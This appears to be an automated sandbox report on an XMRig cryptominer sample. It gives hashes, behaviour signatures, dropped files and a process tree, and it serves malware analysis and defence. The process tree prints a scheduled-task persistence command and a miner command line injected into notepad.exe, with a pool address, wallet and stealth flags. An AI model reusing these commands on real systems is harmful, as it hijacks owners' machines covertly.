Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    147s
  • max time network
    141s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30/12/2023, 04:14

General

  • Target

    0e15f9d8151c82ab4b82f47b7177af7b.exe

  • Size

    311KB

  • MD5

    0e15f9d8151c82ab4b82f47b7177af7b

  • SHA1

    e4ec0960b2b76e969f219298554fa55f09fe7cce

  • SHA256

    8ca50265b5e333bd3c1dfd1b2cbce8d011fdbc94aafd33d73b3bca35c32651cc

  • SHA512

    09b21ec489fb3276907572ebf9ff729853c1c07fd405f031c6a006d94785f08eef6a11e7065e5c7c9dd6cb2852939f8d473df4774f89f35dec33eb448319f5e3

  • SSDEEP

    6144:5/IsgxG1RdAZZ1llyP/WBSgTY7cT7w5fof:5/UxG/21loPuk8Y7Co

Score
10/10

Malware Config

Signatures

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 15 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 2 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 7 IoCs
  • NTFS ADS 12 IoCs
  • Suspicious behavior: EnumeratesProcesses 58 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 27 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\0e15f9d8151c82ab4b82f47b7177af7b.exe
    "C:\Users\Admin\AppData\Local\Temp\0e15f9d8151c82ab4b82f47b7177af7b.exe"
    1⤵
    • Checks computer location settings
    • Modifies registry class
    • NTFS ADS
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4780
    • C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3696
      • C:\Windows\system32\schtasks.exe
        schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
        3⤵
        • Creates scheduled task(s)
        PID:1568
    • C:\Users\Admin\AppData\Roaming\services64.exe
      "C:\Users\Admin\AppData\Roaming\services64.exe"
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • NTFS ADS
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4656
      • C:\Windows\System32\cmd.exe
        "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"' & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3840
        • C:\Windows\system32\schtasks.exe
          schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Users\Admin\AppData\Roaming\services64.exe"'
          4⤵
          • Creates scheduled task(s)
          PID:1212
      • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe
        "C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe"
        3⤵
        • Executes dropped EXE
        PID:1984
      • C:\Windows\System32\notepad.exe
        C:\Windows/System32\notepad.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=pool.xmr.pt:5555 --user=42LWroKkaot7k6VU59vZyz7kxmhQGgWJhfdrEhV5GBkQ1Q6DqNRmoDALTM4PoM5n2JcS4t4wYDXTfWR8oyM8XfQhQxXhvdU --pass=144 --cpu-max-threads-hint=40 --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=1 --cinit-idle-cpu=90 --cinit-stealth
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4064

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\Isolated Storage\{5A006500-4B00-3700-7300-340049006200}

    Filesize

    384B

    MD5

    ed40858472a31df7ec5f10c78c15fae8

    SHA1

    f71c1a7a27bff6a61332c88f6b12f7b7092b3cd5

    SHA256

    c55e2060b15aae7782a8984124d88c2494ed0ca37af19591131c70603a9d9b32

    SHA512

    f29e2c8e5088919350818e679c542b43159d6b687ecfc5c6708d4b65ea909bd32267db952fcd7004ae6d81a4083843c86b11ba9f2f4529efc5db75863dc8488d

  • C:\Users\Admin\AppData\Roaming\Microsoft\Libs\sihost64.exe

    Filesize

    7KB

    MD5

    d98e2e312d89e8e7c0eabcc4218ebae1

    SHA1

    3e12d8fe74ceaca24981252570dfbc5cc4359273

    SHA256

    613e54d34f69bba549edc48177cfa7d96b5f97761acfc4211e79dfcafdd0fa9d

    SHA512

    fee151f8317f083ca4d8898c933e7d07f024af909da2a99ed2d385b16a4f806b9aea422117a5fd146f3850b2e79a7913cbd741442091b5a4257fbf660e235b38

  • C:\Users\Admin\AppData\Roaming\services64.exe

    Filesize

    311KB

    MD5

    0e15f9d8151c82ab4b82f47b7177af7b

    SHA1

    e4ec0960b2b76e969f219298554fa55f09fe7cce

    SHA256

    8ca50265b5e333bd3c1dfd1b2cbce8d011fdbc94aafd33d73b3bca35c32651cc

    SHA512

    09b21ec489fb3276907572ebf9ff729853c1c07fd405f031c6a006d94785f08eef6a11e7065e5c7c9dd6cb2852939f8d473df4774f89f35dec33eb448319f5e3

  • C:\odt:{6C004800-4C00-4400-3900-4E0048006500}

    Filesize

    472B

    MD5

    7c404a6b5c0c3c82a21cdf3c97321541

    SHA1

    bdc0e9c3286debe4b84c5aff0f64f811d7633cf2

    SHA256

    2a5e0d712d8b19a344cbbf8197f76caf5a26986d9d13d6d5b351d1a3dca5db18

    SHA512

    09213c0aea456891be7c43b19fe423fa1ac7883098a976bbc32bf2340e557be72794364cbabed347085dcd22345cdb8b17799813eacb556fd857dc1d7d0acb84

  • memory/1984-66-0x000000001C5B0000-0x000000001C5C0000-memory.dmp

    Filesize

    64KB

  • memory/1984-65-0x00007FF86C3B0000-0x00007FF86CE71000-memory.dmp

    Filesize

    10.8MB

  • memory/1984-64-0x000000001C5B0000-0x000000001C5C0000-memory.dmp

    Filesize

    64KB

  • memory/1984-63-0x00007FF86C3B0000-0x00007FF86CE71000-memory.dmp

    Filesize

    10.8MB

  • memory/1984-61-0x00000000008E0000-0x00000000008E6000-memory.dmp

    Filesize

    24KB

  • memory/4064-79-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-82-0x000001313A950000-0x000001313A970000-memory.dmp

    Filesize

    128KB

  • memory/4064-88-0x000001313A990000-0x000001313A9B0000-memory.dmp

    Filesize

    128KB

  • memory/4064-87-0x000001313A9B0000-0x000001313A9D0000-memory.dmp

    Filesize

    128KB

  • memory/4064-86-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-85-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-84-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-83-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-81-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-80-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-74-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-77-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-78-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-68-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-69-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-72-0x000001313A920000-0x000001313A940000-memory.dmp

    Filesize

    128KB

  • memory/4064-71-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-75-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4064-76-0x0000000140000000-0x0000000140786000-memory.dmp

    Filesize

    7.5MB

  • memory/4656-33-0x00007FF86C3B0000-0x00007FF86CE71000-memory.dmp

    Filesize

    10.8MB

  • memory/4656-35-0x000000001B170000-0x000000001B180000-memory.dmp

    Filesize

    64KB

  • memory/4656-44-0x00007FF86C3B0000-0x00007FF86CE71000-memory.dmp

    Filesize

    10.8MB

  • memory/4656-62-0x000000001B170000-0x000000001B180000-memory.dmp

    Filesize

    64KB

  • memory/4656-73-0x00007FF86C3B0000-0x00007FF86CE71000-memory.dmp

    Filesize

    10.8MB

  • memory/4780-11-0x0000000002C80000-0x0000000002C8E000-memory.dmp

    Filesize

    56KB

  • memory/4780-12-0x000000001BDA0000-0x000000001BDB2000-memory.dmp

    Filesize

    72KB

  • memory/4780-1-0x00007FF86C3B0000-0x00007FF86CE71000-memory.dmp

    Filesize

    10.8MB

  • memory/4780-13-0x000000001BDD0000-0x000000001BDDA000-memory.dmp

    Filesize

    40KB

  • memory/4780-17-0x00007FF86C3B0000-0x00007FF86CE71000-memory.dmp

    Filesize

    10.8MB

  • memory/4780-4-0x000000001B780000-0x000000001B790000-memory.dmp

    Filesize

    64KB

  • memory/4780-31-0x000000001B780000-0x000000001B790000-memory.dmp

    Filesize

    64KB

  • memory/4780-32-0x00007FF86C3B0000-0x00007FF86CE71000-memory.dmp

    Filesize

    10.8MB

  • memory/4780-0-0x0000000000B60000-0x0000000000BB4000-memory.dmp

    Filesize

    336KB